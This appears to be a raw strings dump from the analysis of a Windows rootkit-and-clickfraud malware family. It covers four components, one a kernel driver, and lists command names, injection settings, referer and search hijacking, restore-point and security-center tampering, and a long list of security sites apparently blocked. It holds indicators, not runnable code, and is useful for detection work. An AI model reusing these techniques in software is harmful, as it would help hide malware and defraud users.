0x000067E0	0x0000006A	User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
0x0000684C	0x00000016	Accept-Language: en-us
0x00006864	0x0000000F	gesualdo.alexa.
0x00006874	0x00000011	.googlehosted.com
0x00006888	0x00000010	cc.msnscache.com
0x0000689C	0x00000015	searchapi.search.aol.
0x000068B4	0x00000009	askcache.
0x000068C0	0x00000014	microsofttranslator.
0x000068D8	0x0000000A	altavista.
0x000068E4	0x0000000A	alltheweb.
0x000068F0	0x00000015	scorecardresearch.com
0x00006908	0x0000000E	.alexametrics.
0x00006918	0x0000000B	googleapis.
0x00006924	0x00000006	.ixnp.
0x0000692C	0x0000000D	.everesttech.
0x0000693C	0x00000014	google-analytics.com
0x00006954	0x00000008	i.i.com.
0x00006960	0x0000000C	img.youtube.
0x00006970	0x00000009	.gstatic.
0x0000697C	0x00000007	dw.com.
0x00006984	0x00000005	.icq.
0x0000698C	0x00000007	sa.aol.
0x00006994	0x00000008	dmn.aol.
0x000069A0	0x00000005	.aol.
0x000069A8	0x0000000A	atwola.com
0x000069B4	0x00000007	aolcdn.
0x000069BC	0x00000006	atdmt.
0x000069C4	0x00000006	yahoo.
0x000069CC	0x00000005	bing.
0x000069D4	0x00000007	.google
0x000069DC	0x0000000A	rds.yahoo.
0x000069E8	0x00000005	yimg.
0x000069F0	0x00000007	http://
0x000069F8	0x00000006	Host: 
0x00006A00	0x00000007	HTTP/1.
0x00006A08	0x00000009	Referer: 
0x00006A14	0x0000000D	googlehosted.
0x00006A40	0x00000018	iexplore.exe
0x00006A5C	0x00000024	Software\Microsoft\Internet Explorer
0x00006A84	0x00000007	Version
0x00006A8C	0x00000016	firefox.exe
0x00006AA4	0x00000012	opera.exe
0x00006AB8	0x00000014	Safari.exe
0x00006AD0	0x00000014	chrome.exe
0x00006AE8	0x00000010	0123456789ABCDEF
0x00006AFC	0x0000000F	Software\pragma
0x00006B0C	0x00000024	48a10810-b8c6-442e-b021-2f1a5deb810c
0x00006B34	0x00000008	wget 3.0
0x00006B44	0x00000009	-_.!~*'()
0x00006B50	0x00000006	pragma
0x00006B58	0x0000000E	default
0x00006D86	0x00000007	strncpy
0x00006D90	0x00000007	_strlwr
0x00006D9A	0x00000006	strstr
0x00006DA4	0x00000006	strchr
0x00006DAE	0x00000007	isalnum
0x00006DB8	0x00000006	_ultow
0x00006DC2	0x0000001C	RtlImageDirectoryEntryToData
0x00006DE2	0x00000010	RtlImageNtHeader
0x00006DF6	0x00000005	_wtol
0x00006DFC	0x00000009	ntdll.dll
0x00006E09	0x0000000A	SASetEvent
0x00006E14	0x0000000A	WS2_32.dll
0x00006E22	0x00000008	StrStrIA
0x00006E2E	0x00000008	StrCmpIW
0x00006E3A	0x00000007	StrStrA
0x00006E44	0x0000000A	wnsprintfA
0x00006E52	0x00000009	StrCmpNIA
0x00006E5E	0x00000008	StrStrIW
0x00006E6A	0x00000008	StrCmpNA
0x00006E76	0x00000007	StrChrA
0x00006E7E	0x0000000B	SHLWAPI.dll
0x00006E8D	0x00000017	nternetCanonicalizeUrlA
0x00006EA8	0x00000010	InternetOpenUrlA
0x00006EBC	0x00000010	InternetReadFile
0x00006ED0	0x0000000D	InternetOpenA
0x00006EE1	0x00000012	nternetCloseHandle
0x00006EF4	0x0000000B	WININET.dll
0x00006F02	0x00000008	lstrcmpA
0x00006F0E	0x00000008	lstrlenA
0x00006F1A	0x00000009	lstrcpynA
0x00006F26	0x0000000C	GetTickCount
0x00006F36	0x0000000B	VirtualFree
0x00006F44	0x00000019	InitializeCriticalSection
0x00006F60	0x00000005	Sleep
0x00006F68	0x00000014	LeaveCriticalSection
0x00006F80	0x0000000D	IsBadWritePtr
0x00006F90	0x00000008	lstrcatA
0x00006F9C	0x00000013	MultiByteToWideChar
0x00006FB2	0x0000000C	GetTempPathW
0x00006FC2	0x00000013	InterlockedExchange
0x00006FD8	0x00000018	FreeLibraryAndExitThread
0x00006FF4	0x00000009	lstrcmpiA
0x00007000	0x0000000C	VirtualAlloc
0x00007010	0x00000014	EnterCriticalSection
0x00007028	0x00000019	DisableThreadLibraryCalls
0x00007044	0x00000018	GetPrivateProfileStringA
0x00007060	0x0000000C	GetLocalTime
0x00007070	0x0000000C	LoadLibraryA
0x00007080	0x00000012	GetModuleFileNameA
0x00007096	0x00000008	lstrcatW
0x000070A3	0x0000000A	loseHandle
0x000070B0	0x0000000C	GetTempPathA
0x000070C0	0x0000000D	GetSystemTime
0x000070D0	0x0000000B	DeleteFileA
0x000070DF	0x0000000B	reateThread
0x000070EE	0x00000008	lstrcpyA
0x000070FA	0x00000012	GetModuleFileNameW
0x00007111	0x0000000A	reateFileA
0x0000711E	0x0000000B	GetFileSize
0x0000712C	0x00000014	SystemTimeToFileTime
0x00007144	0x00000018	GetPrivateProfileStringW
0x00007160	0x00000009	WriteFile
0x0000716C	0x00000008	ReadFile
0x00007178	0x0000001A	WritePrivateProfileStringW
0x00007196	0x00000010	GetTempFileNameA
0x000071AA	0x0000000E	VirtualProtect
0x000071BA	0x0000000C	KERNEL32.dll
0x000071CA	0x00000010	RegQueryValueExA
0x000071DE	0x0000000D	RegOpenKeyExA
0x000071EE	0x0000000B	RegCloseKey
0x000071FC	0x0000000E	RegSetValueExA
0x0000720E	0x0000000D	RegCreateKeyA
0x0000721C	0x0000000C	ADVAPI32.dll
0x0000722C	0x00000017	SHGetSpecialFolderPathA
0x00007244	0x0000000B	SHELL32.dll
0x00007252	0x00000006	memcpy
0x0000725C	0x00000006	memset
0x00007266	0x00000007	_chkstk
0x00007270	0x00000008	_aulldiv
0x0000727C	0x00000007	_allmul
0x00007286	0x00000008	_aullrem
0x000072C2	0x0000000B	Clicker.dll
0x000072CE	0x0000000A	_Install@0
0x00008013	0x000000CE	<script ty
0x00008123	0x00000056	window.location="%s";
0x00008193	0x0000009F	ClickMeredirect.
0x00008238	0x00000040	ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
0x00008293	0x000000CE	<script ty
0x000083A3	0x00000056	window.location="%s";
0x00008413	0x0000009F	ClickMeredirect.
0x000084CB	0x000000CE	<script ty
0x000085DB	0x00000056	window.location="%s";
0x0000864B	0x0000009F	ClickMeredirect.
0x00008783	0x000000CE	<script ty
0x00008893	0x00000056	window.location="%s";
0x00008903	0x0000009F	ClickMeredirect.
0x0001E5D4	0x0000000C	63<3B3H3N3T3
0x000260A0	0x0000000C	kernel32.dll
0x000260AF	0x0000000F	GetCommandLineA
0x000260C1	0x0000000C	GetTempPathA
0x000260D0	0x0000000B	CloseHandle
0x000260DE	0x0000000F	GetStartupInfoA
0x000260F0	0x0000000E	VirtualProtect
0x00026101	0x00000009	FatalExit
0x0002610E	0x0000000A	user32.dll
0x0002611B	0x00000012	IsDlgButtonChecked
0x00026130	0x0000000C	GetUpdateRgn
0x00027032	0x0000000D	sciqfvgxk.exe
0x00027040	0x0000000C	SetIktawoxpd

pragmac.dll strings:

0x000001D0	0x00000005	.text
0x000001F7	0x00000007	`.rdata
0x0000021F	0x00000006	@.data
0x00000248	0x00000005	.test
0x00000270	0x00000006	.reloc
0x00000297	0x00000009	B.datatxt
0x000002BF	0x00000007	@.rdata
0x000002E7	0x00000007	@.ldata
0x0000030F	0x00000007	@.rdsec
0x00000338	0x00000005	.rsrc
0x0000035F	0x00000007	@.sdata
0x00000387	0x00000007	@.mdata
0x000003AF	0x00000007	@.kdata
0x000003D7	0x00000007	@.edata
0x000011DF	0x00000008	T$0RVhHD
0x00001E01	0x00000006	SVWj@h
0x00002028	0x00000005	QVj@h
0x000029D9	0x00000005	tGj@h
0x00002D77	0x00000005	SWhhF
0x0000300E	0x00000005	SVhtD
0x000043A7	0x0000000D	 \license.dat
0x000043B8	0x0000002C	94804860143697233939975370329435970097710202
0x000043E8	0x00000018	ROOT\DEFAULT
0x00004404	0x0000001A	SystemRestore
0x00004420	0x00000014	SRRemoveRestorePoint
0x00004438	0x0000000C	srclient.dll
0x00004448	0x0000001C	SequenceNumber
0x00004468	0x00000008	%s_%s_ok
0x00004480	0x00000054	\registry\machine\software\PRAGMA\injector
0x000044DC	0x0000000A	injections
0x000044E8	0x00000005	%s;%s
0x000044F8	0x00000006	PRAGMA
0x00004500	0x00000010	cmddelay
0x00004518	0x00000042	\registry\machine\software\PRAGMA
0x0000455C	0x0000000E	PRAGMAsrcr.dat
0x00004570	0x00000054	\registry\machine\software\PRAGMA\versions
0x000045DC	0x00000012	%[^.].%[^(](%[^)])
0x000045F0	0x00000005	%s/%s
0x000045F8	0x0000000A	build
0x00004610	0x0000000A	affid
0x0000461C	0x0000000A	subid
0x00004628	0x00000007	%s (%d)
0x00004630	0x00000035	file=%s&address=0x%x&image=%s&code=0x%x&info=%s&id=%s
0x00004668	0x00000010	PRAGMAerrors.log
0x0000467C	0x00000018	%[^;];%[^;];%[^;];%[^;];
0x00004698	0x0000000F	software\PRAGMA
0x000046A8	0x00000005	affid
0x000046B0	0x00000005	subid
0x000046B8	0x00000005	botid
0x000046C0	0x00000006	common
0x000046C8	0x00000005	build
0x000046D0	0x0000000E	netsvcs
0x000046E0	0x0000004A	\ACA9DB5C-7EAB-4026-A9A7-BED05538CE9D
0x0000472C	0x0000001A	PRAGMAcfg.ini
0x00004748	0x0000000B	PRAGMAc.dll
0x00004754	0x0000000B	PRAGMAd.sys
0x00004768	0x0000000A	%s%s%x.tmp
0x00004778	0x000000AC	software\microsoft\internet explorer\main\featurecontrol\feature_enable_ie_compression
0x00004828	0x0000000A	urlmon.dll
0x00004834	0x00000005	.test
0x0000483C	0x00000005	%u-%s
0x0000484C	0x00000022	\\?\globalroot\systemroot\system32
0x00004870	0x00000005	%s\%s
0x00004878	0x0000002F	Content-Type: application/x-www-form-urlencoded
0x000048A8	0x0000000C	PRAGMA
0x000048B8	0x00000015	ObtainUserAgentString
0x000048D0	0x00000037	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0x000053DE	0x00000008	tdll.dll
0x000053E7	0x00000007	CmdExec
0x000053EF	0x0000000C	CmdExecAffID
0x000053FC	0x0000000C	CmdExecBuild
0x00005409	0x0000000C	CmdExecSubID
0x00005416	0x0000000B	CmdExecType
0x00005422	0x0000000E	CmdExecVersion
0x00005431	0x00000008	CmdKnock
0x0000543A	0x0000000C	FileDownload
0x00005447	0x00000012	FileDownloadRandom
0x0000545A	0x0000000B	InjectorAdd
0x00005466	0x0000000B	InjectorSet
0x00005472	0x00000013	ModuleDownloadUnxor
0x00005486	0x0000000A	ModuleLoad
0x00005491	0x0000000C	ModuleUnload
0x0000549E	0x0000000B	SetCmdDelay
0x00007000	0x00000011	336;direct;no;no;
0x0000F0A0	0x0000000C	kernel32.dll
0x0000F0AF	0x0000000F	GetCommandLineA
0x0000F0C1	0x0000000C	GetTempPathA
0x0000F0D0	0x0000000B	CloseHandle
0x0000F0DE	0x0000000F	GetStartupInfoA
0x0000F0F0	0x0000000E	VirtualProtect
0x0000F101	0x00000009	FatalExit
0x0000F10E	0x0000000A	user32.dll
0x0000F11B	0x00000012	IsDlgButtonChecked
0x0000F130	0x0000000C	GetUpdateRgn
0x0000F432	0x0000000A	cseteo.exe
0x0000F43D	0x00000007	Caokyjf

pragmaserf.dll strings:

0x000001D8	0x00000005	.text
0x000001FF	0x00000007	`.rdata
0x00000227	0x00000006	@.data
0x00000250	0x00000006	.reloc
0x00000277	0x00000009	B.datatxt
0x0000029F	0x00000007	@.rdata
0x000002C7	0x00000007	@.ldata
0x000002EF	0x00000007	@.rdsec
0x00000318	0x00000005	.rsrc
0x0000033F	0x00000007	@.sdata
0x00000367	0x00000007	@.mdata
0x0000038F	0x00000007	@.kdata
0x000003B7	0x00000007	@.edata
0x00001076	0x00000005	D$ Pj
0x000010D5	0x00000005	T$ Rj
0x00001134	0x00000005	L$ Qj
0x00001193	0x00000005	D$ Pj
0x000011F8	0x00000005	tZhHR
0x00001278	0x00000005	$PhXR
0x000012B7	0x00000005	D$$Pj
0x000012F1	0x00000005	D$(Pj
0x0000146F	0x00000006	D$ hTS
0x0000161E	0x00000005	L$DQh
0x000026E3	0x00000007	D$,PSSh
0x00002954	0x00000007	UWSPh<V
0x00002C4C	0x00000005	D$,Pj
0x00002C91	0x00000005	D$,Pj
0x00003092	0x00000007	D$<PSSh
0x000036A1	0x00000005	v]j@h
0x0000413E	0x00000007	UUUUh`]
0x000045B6	0x00000007	l$4VWUj
0x000045E2	0x00000005	D$<Pj
0x0000465D	0x00000005	T$$Rj
0x000046CE	0x00000005	D$4Pj
0x00005178	0x0000000F	searchequal.com
0x00005188	0x0000000D	findsomup.org
0x00005198	0x0000000D	raincfind.org
0x000051A8	0x0000002C	94804860143697233939975370329435970097710202
0x000051D8	0x0000002C	85108357713673677262162845570576027004153211
0x00005208	0x00000007	License
0x00005210	0x0000001A	Software\Paladin Antivirus
0x0000522C	0x00000018	Software\Malware Defense
0x00005248	0x0000000C	\license.dat
0x00005258	0x00000034	Software\Microsoft\Internet Explorer\Recovery\Active
0x00005290	0x00000012	[PANEL_SIGN_CHECK]
0x000052A4	0x0000000C	[panels_end]
0x000052B4	0x0000000E	[panels_begin]
0x000052C8	0x0000000F	Use FormSuggest
0x000052D8	0x00000029	Software\Microsoft\Internet Explorer\Main
0x00005310	0x00000043	Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
0x00005354	0x00000013	NoReopenLastSession
0x00005368	0x00000036	Software\Policies\Microsoft\Internet Explorer\Recovery
0x000053A0	0x0000000B	AutoRecover
0x000053AC	0x0000002D	Software\Microsoft\Internet Explorer\Recovery
0x000053E0	0x00000012	Check_Associations
0x000053F4	0x00000016	Play_Background_Sounds
0x0000540C	0x0000003B	AppEvents\Schemes\Apps\Explorer\ActivatingDocument\.current
0x0000544C	0x00000033	AppEvents\Schemes\Apps\Explorer\Navigating\.current
0x00005480	0x00000031	AppEvents\Schemes\Apps\.Default\CCSelect\.Current
0x000054B4	0x00000008	test.reg
0x000054C0	0x00000010	\regedit.exe /s 
0x000054D4	0x00000009	referer: 
0x000054E4	0x0000000E	msacm32
0x000054F4	0x00000007	msacm32
0x000054FC	0x0000000B	Referer: %s
0x00005508	0x0000000C	iexplore.exe
0x00005518	0x0000000E	popupcount_end
0x00005528	0x00000012	[popupcount_begin]
0x0000553C	0x00000010	[runs_count_end]
0x00005550	0x00000012	[runs_count_begin]
0x00005564	0x00000012	[urls_to_serf_end]
0x00005578	0x00000014	[urls_to_serf_begin]
0x00005590	0x00000014	[refs_to_change_end]
0x000055A8	0x00000016	[refs_to_change_begin]
0x000055C0	0x0000000F	[popupurl2_end]
0x000055D0	0x00000011	[popupurl2_begin]
0x000055E4	0x00000022	\Internet Explorer\iexplore.exe %s
0x00005608	0x0000000D	pragmacfg.ini
0x0000561C	0x00000005	affid
0x00005624	0x00000006	common
0x0000562C	0x00000007	default
0x00005634	0x00000005	subid
0x0000563C	0x00000037	http://%s/?gd=%s&affid=%s&subid=%s&prov=&mode=cr&v=6nkr
0x00005674	0x0000000A	OK_INSTALL
0x00005680	0x0000000A	GET_PARAMS
0x00005694	0x0000000F	Software\pragma
0x000056AC	0x00000008	TestDesk
0x000056B8	0x0000000A	IEUser.exe
0x000056C4	0x0000000C	explorer.exe
0x000056D4	0x0000000A	chrome.exe
0x000056E0	0x0000000A	Safari.exe
0x000056EC	0x00000009	opera.exe
0x000056F8	0x0000000B	firefox.exe
0x00005704	0x0000000A	ieuser.exe
0x00005710	0x00000014	\pragmamfeklnmal.dll
0x00005728	0x00000016	HttpAddRequestHeadersA
0x00005740	0x00000007	wininet
0x00005748	0x00000016	HttpAddRequestHeadersW
0x00005760	0x00000010	HttpOpenRequestW
0x00005774	0x00000010	HttpOpenRequestA
0x00005788	0x00000010	InternetConnectW
0x0000579C	0x00000010	InternetConnectA
0x000057B0	0x00000007	http://
0x000057B8	0x0000000C	LoadLibraryW
0x000057C8	0x00000008	kernel32
0x000057D4	0x0000000C	LoadLibraryA
0x000057E4	0x00000014	CreateProcessAsUserW
0x000057FC	0x00000008	Advapi32
0x00005808	0x0000000C	indobids.com
0x00005818	0x00000011	spywarefixpro.com
0x0000582C	0x00000011	trojan-killer.net
0x00005840	0x0000000D	hijackthis.nl
0x00005850	0x00000014	virusremovalguru.com
0x00005868	0x0000000F	pc-helpforum.be
0x00005878	0x00000015	howtofixcomputers.com
0x00005890	0x0000000A	zimbio.com
0x0000589C	0x0000000C	xp-vista.com
0x000058AC	0x00000015	windowsprotection.net
0x000058C4	0x00000015	whois.domaintools.com
0x000058DC	0x00000013	webtoolsandtips.com
0x000058F0	0x0000000E	wareseeker.com
0x00005900	0x0000000E	tech.yahoo.com
0x00005910	0x0000000F	spywarevoid.com
0x00005920	0x00000013	spywares-remove.com
0x00005934	0x00000011	spywareremove.com
0x00005948	0x00000013	spywaredetector.net
0x0000595C	0x00000012	spyware-techie.com
0x00005970	0x00000009	spyna.com
0x0000597C	0x00000008	snpx.com
0x00005988	0x0000001D	rogueantispyware.blogspot.com
0x000059A8	0x0000001A	rogue-malware.blogspot.com
0x000059C4	0x0000000F	removevirus.org
0x000059D4	0x0000000D	removeit.info
0x000059E4	0x00000017	remove-spy.blogspot.com
0x000059FC	0x00000012	remove-malware.net
0x00005A10	0x00000010	removal-tool.com
0x00005A24	0x00000013	precisesecurity.com
0x00005A38	0x0000000F	powerclickz.com
0x00005A48	0x0000000C	pcthreat.com
0x00005A58	0x0000000E	pcindanger.com
0x00005A68	0x0000000B	pc1news.com
0x00005A74	0x0000000F	news.loaris.com
0x00005A84	0x00000011	myantispyware.com
0x00005A98	0x0000000F	malwarehelp.org
0x00005AA8	0x0000000C	lognrock.com
0x00005AB8	0x0000000C	kiguolis.com
0x00005AC8	0x00000009	iobit.com
0x00005AD4	0x0000000F	im-infected.com
0x00005AE4	0x00000010	hands-oncorp.com
0x00005AF8	0x0000000D	geekstogo.com
0x00005B08	0x00000014	freepcsecurity.co.uk
0x00005B20	0x0000000F	forum.drweb.com
0x00005B30	0x0000000E	findmysoft.com
0x00005B40	0x0000000B	fakeware.ru
0x00005B4C	0x00000011	ezinearticles.com
0x00005B60	0x00000012	exterminate-it.com
0x00005B74	0x00000012	enigmasoftware.com
0x00005B88	0x0000000F	downloadbox.org
0x00005B98	0x0000000E	comprolive.com
0x00005BA8	0x00000024	cid-556a72d9038a7868.spaces.live.com
0x00005BD0	0x00000018	carnegiecyberacademy.com
0x00005BEC	0x0000000F	cantalktech.com
0x00005BFC	0x0000000F	brothersoft.com
0x00005C0C	0x0000000F	blogcatalog.com
0x00005C1C	0x00000014	bleepingcomputer.com
0x00005C34	0x0000001E	bharath-m-narayan.blogspot.com
0x00005C54	0x00000012	beyondsecurity.com
0x00005C68	0x00000010	averyjparker.com
0x00005C7C	0x00000018	antispyware.wetpaint.com
0x00005C98	0x0000000F	antispyware.com
0x00005CA8	0x00000014	anti-spyware-101.com
0x00005CC0	0x00000011	answers.yahoo.com
0x00005CD4	0x0000000C	PCTHREAT.com
0x00005CE4	0x0000000F	411-spyware.com
0x00005CF4	0x0000000D	2-viruses.com
0x00005D04	0x0000000D	2-spyware.com
0x00005D14	0x0000000A	2-free.net
0x00005D20	0x00000024	dae91b54-7265-4dac-b01e-e4787b4ccaea
0x00005D48	0x00000006	pragma
0x00005D60	0x00000008	wget 3.0
0x00005D6C	0x00000008	Internet
0x00005D78	0x00000020	SeDebugPrivilege
0x00005FC6	0x00000006	strstr
0x00005FD0	0x00000007	strncpy
0x00005FDA	0x00000007	strtoul
0x00005FE4	0x00000007	_strlwr
0x00005FEE	0x0000001C	RtlImageDirectoryEntryToData
0x0000600E	0x00000019	ZwQueryInformationProcess
0x0000602A	0x00000010	RtlImageNtHeader
0x0000603C	0x00000009	ntdll.dll
0x00006048	0x00000008	StrStrIA
0x00006054	0x00000008	StrStrIW
0x00006060	0x0000000A	wnsprintfA
0x0000606E	0x00000009	StrCmpNIA
0x00006078	0x0000000B	SHLWAPI.dll
0x00006087	0x00000010	nternetCrackUrlA
0x0000609A	0x00000010	InternetReadFile
0x000060AE	0x0000000D	InternetOpenA
0x000060BF	0x00000012	nternetCloseHandle
0x000060D4	0x00000010	InternetOpenUrlA
0x000060E6	0x0000000B	WININET.dll
0x000060F4	0x00000017	SHGetSpecialFolderPathA
0x0000610C	0x0000000B	SHELL32.dll
0x0000611A	0x0000000D	EnumProcesses
0x0000612A	0x00000014	GetModuleFileNameExA
0x00006140	0x00000009	PSAPI.DLL
0x0000614D	0x0000000A	reateFileA
0x0000615A	0x00000008	lstrlenA
0x00006166	0x0000000B	VirtualFree
0x00006174	0x00000014	GetWindowsDirectoryA
0x0000618C	0x00000009	WriteFile
0x00006198	0x0000000F	GetCommandLineA
0x000061AA	0x00000013	WideCharToMultiByte
0x000061C0	0x00000005	Sleep
0x000061C9	0x0000000D	reateProcessA
0x000061DA	0x0000000D	IsBadWritePtr
0x000061EA	0x00000010	TerminateProcess
0x000061FE	0x00000008	lstrcatA
0x0000620A	0x00000013	MultiByteToWideChar
0x00006220	0x0000000F	GetStartupInfoW
0x00006232	0x00000018	FreeLibraryAndExitThread
0x0000624E	0x00000009	lstrcmpiA
0x0000625A	0x0000000C	VirtualAlloc
0x0000626A	0x00000019	DisableThreadLibraryCalls
0x00006286	0x00000018	GetPrivateProfileStringA
0x000062A2	0x0000000C	LoadLibraryA
0x000062B2	0x00000012	GetModuleFileNameA
0x000062C8	0x00000012	GetCurrentThreadId
0x000062DE	0x00000007	WinExec
0x000062E9	0x0000000A	loseHandle
0x000062F6	0x0000000C	GetTempPathA
0x00006306	0x0000000D	GetSystemTime
0x00006316	0x0000000B	DeleteFileA
0x00006325	0x0000000B	reateThread
0x00006334	0x00000008	lstrcpyA
0x00006340	0x0000000B	GetFileSize
0x0000634E	0x0000000E	SetFilePointer
0x00006360	0x00000009	lstrcpynA
0x0000636C	0x00000011	GetCurrentProcess
0x00006380	0x00000010	GetCurrentThread
0x00006394	0x0000000B	OpenProcess
0x000063A2	0x00000011	ReadProcessMemory
0x000063B6	0x0000000D	GetVersionExW
0x000063C6	0x00000008	ReadFile
0x000063D2	0x0000000C	GetLastError
0x000063E2	0x0000000C	SetLastError
0x000063F2	0x00000010	GetTempFileNameA
0x00006406	0x0000000E	VirtualProtect
0x00006416	0x0000000C	KERNEL32.dll
0x00006427	0x0000000B	loseDesktop
0x00006436	0x00000009	wsprintfA
0x00006443	0x0000000D	reateDesktopA
0x00006454	0x00000010	GetThreadDesktop
0x00006468	0x00000018	GetWindowThreadProcessId
0x00006484	0x00000010	GetSystemMetrics
0x00006498	0x0000000C	SetWindowPos
0x000064A8	0x0000000E	GetWindowTextA
0x000064BA	0x0000000B	EnumWindows
0x000064C6	0x0000000A	USER32.dll
0x000064D4	0x0000000D	RegCreateKeyA
0x000064E4	0x0000000F	RegDeleteValueA
0x000064F6	0x0000000D	RegEnumValueA
0x00006506	0x0000000B	RegCloseKey
0x00006514	0x00000010	OpenProcessToken
0x00006528	0x0000000F	OpenThreadToken
0x0000653A	0x00000013	GetTokenInformation
0x00006550	0x0000000E	RegSetValueExA
0x00006562	0x00000010	RegQueryValueExA
0x00006576	0x00000015	LookupPrivilegeValueW
0x0000658E	0x0000000B	RegOpenKeyA
0x0000659C	0x00000015	AdjustTokenPrivileges
0x000065B2	0x0000000C	ADVAPI32.dll
0x000065C2	0x00000006	memcpy
0x000065CC	0x00000006	memset
0x000065D6	0x00000007	_chkstk
0x00006612	0x0000000A	NkrDll.dll
0x0000661D	0x0000000A	_Install@0
0x00007000	0x00000040	ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
0x0000C493	0x0000000B	86<<<B<H<N<
0x0000C513	0x0000001F	1 1$1(1,1014181x>|>
0x000110E4	0x00000005	cuvwx
0x000140A0	0x0000000C	kernel32.dll
0x000140AF	0x0000000F	GetCommandLineA
0x000140C1	0x0000000C	GetTempPathA
0x000140D0	0x0000000B	CloseHandle
0x000140DE	0x0000000F	GetStartupInfoA
0x000140F0	0x0000000E	VirtualProtect
0x00014101	0x00000009	FatalExit
0x0001410E	0x0000000A	user32.dll
0x0001411B	0x00000012	IsDlgButtonChecked
0x00014130	0x0000000C	GetUpdateRgn
0x00015032	0x00000009	lpoaw.exe
0x0001503C	0x00000007	Mjexfdm

pragmad.sys strings:

0x000001C0	0x00000005	.text
0x000001E7	0x00000007	`.rdata
0x0000020F	0x00000006	@.data
0x00000238	0x00000005	.test
0x00000260	0x00000006	.reloc
0x00000287	0x00000009	Bsecsct10
0x000002B0	0x00000008	nr7rc660
0x000002D8	0x00000005	idata
0x000002FF	0x00000007	@.idata
0x00000328	0x00000005	.rsrc
0x00004110	0x0000001A	PRAGMAcfg.ini
0x0000412C	0x0000000C	PRAGMA
0x0000413C	0x0000000E	\\?\globalroot
0x0000414C	0x0000000A	%s\%s
0x0000415C	0x0000000A	start
0x00004174	0x00000012	imagepath
0x00004190	0x0000000B	file system
0x0000419C	0x0000000A	group
0x000041AC	0x00000010	\\?\globalroot%s
0x000041C0	0x00000054	\registry\machine\software\PRAGMA\injector
0x00004224	0x0000000B	svchost.exe
0x00004230	0x0000000B	PRAGMAc.dll
0x0000423C	0x0000001C	*\KERNEL32.DLL
0x0000425C	0x00000016	*\NTDLL.DLL
0x00004274	0x00000017	NtFlushInstructionCache
0x0000428C	0x0000000E	LoadLibraryExA
0x000042A4	0x00000024	\FileSystem\FltMgr
0x000042CC	0x00000012	*\PRAGMA*
0x000042E0	0x0000001C	*\TEMP\PRAGMA*
0x00004300	0x00000030	*\SYSTEM32\CONFIG\SYSTEM
0x00004334	0x00000034	*\SYSTEM32\CONFIG\SOFTWARE
0x0000436C	0x0000000A	chkdsk.exe
0x00004378	0x00000026	\filesystem\fastfat
0x000043A0	0x00000020	\filesystem\ntfs
0x000043C4	0x0000001A	\driver\tcpip
0x000043E0	0x0000001C	\driver\ftdisk
0x00004400	0x00000018	\driver\disk
0x0000441C	0x0000001A	\driver\atapi
0x00004438	0x0000001E	\driver\volsnap
0x00004458	0x0000001E	\driver\partmgr
0x00004478	0x0000001E	\filesystem\raw
0x00004498	0x00000016	svchost.exe
0x000044B0	0x00000006	System
0x000044B8	0x00000012	ntdll.dll
0x000044CC	0x00000018	kernel32.dll
0x000044E8	0x00000005	.test
0x000044F0	0x00000072	\registry\machine\system\currentcontrolset\services\luafv
0x00004568	0x00000074	\registry\machine\system\currentcontrolset\services\wscsvc
0x000045E8	0x0000000E	modules
0x000045F8	0x00000016	PRAGMAc.dll
0x00004610	0x000000A8	\registry\machine\system\currentcontrolset\enum\root\legacy_PRAGMAd.sys000\control
0x000046C0	0x00000098	\registry\machine\system\currentcontrolset\enum\root\legacy_PRAGMAd.sys000
0x00004760	0x0000008E	\registry\machine\system\currentcontrolset\enum\root\legacy_PRAGMAd.sys
0x000047F8	0x0000002E	\systemroot\system32\%S
0x00004828	0x00000018	KeServiceDescriptorTable
0x00004992	0x00000007	wcsrchr
0x0000499C	0x00000007	wcsncpy
0x000049A6	0x00000014	RtlInitUnicodeString
0x000049BE	0x0000000A	ZwOpenFile
0x000049CC	0x00000007	ZwClose
0x000049D6	0x00000008	_stricmp
0x000049E2	0x00000008	_wcsicmp
0x000049EE	0x00000006	strstr
0x000049F8	0x00000007	strrchr
0x00004A02	0x00000006	strchr
0x00004A0C	0x00000009	_snprintf
0x00004A18	0x00000007	strncpy
0x00004A22	0x00000009	ZwOpenKey
0x00004A2E	0x0000000F	ZwQueryValueKey
0x00004A40	0x0000000A	_snwprintf
0x00004A4E	0x0000000B	ZwCreateKey
0x00004A5C	0x00000013	ZwSetSecurityObject
0x00004A72	0x00000014	RtlCreateRegistryKey
0x00004A8A	0x00000015	RtlWriteRegistryValue
0x00004AA2	0x00000017	ObReferenceObjectByName
0x00004ABC	0x00000012	IoDriverObjectType
0x00004AD2	0x00000014	ObfDereferenceObject
0x00004AEB	0x00000010	xFreePoolWithTag
0x00004AFE	0x00000017	ZwAllocateVirtualMemory
0x00004B18	0x00000007	sprintf
0x00004B22	0x00000012	KeGetCurrentThread
0x00004B38	0x00000016	KeDelayExecutionThread
0x00004B52	0x00000013	IoGetCurrentProcess
0x00004B68	0x00000017	FsRtlIsNameInExpression
0x00004B82	0x0000001C	MmMapLockedPagesSpecifyCache
0x00004BA2	0x00000015	RtlEqualUnicodeString
0x00004BBA	0x00000016	IoQueryFileInformation
0x00004BD4	0x00000010	IoCancelFileOpen
0x00004BE8	0x00000008	swprintf
0x00004BF5	0x0000000D	xAllocatePool
0x00004C06	0x00000012	IofCompleteRequest
0x00004C1C	0x0000000D	IofCallDriver
0x00004C2C	0x0000000E	ZwEnumerateKey
0x00004C3E	0x00000017	ZwFlushInstructionCache
0x00004C58	0x0000000D	ZwQueryObject
0x00004C68	0x00000010	RtlCompareMemory
0x00004C7C	0x0000001A	PsLookupProcessByProcessId
0x00004C9A	0x00000014	KeStackAttachProcess
0x00004CB2	0x00000016	KeUnstackDetachProcess
0x00004CCC	0x00000010	RtlImageNtHeader
0x00004CE0	0x0000000C	ZwCreateFile
0x00004CF0	0x0000000B	ZwWriteFile
0x00004CFE	0x00000018	PsLookupThreadByThreadId
0x00004D1A	0x00000018	KeServiceDescriptorTable
0x00004D36	0x00000012	ObfReferenceObject
0x00004D4C	0x00000015	ObMakeTemporaryObject
0x00004D64	0x0000001B	PsSetLoadImageNotifyRoutine
0x00004D83	0x0000000E	xQueueWorkItem
0x00004D92	0x0000000C	ntoskrnl.exe
0x00004DA2	0x0000000B	ZwDeleteKey
0x00004DB0	0x00000019	ZwQueryInformationProcess
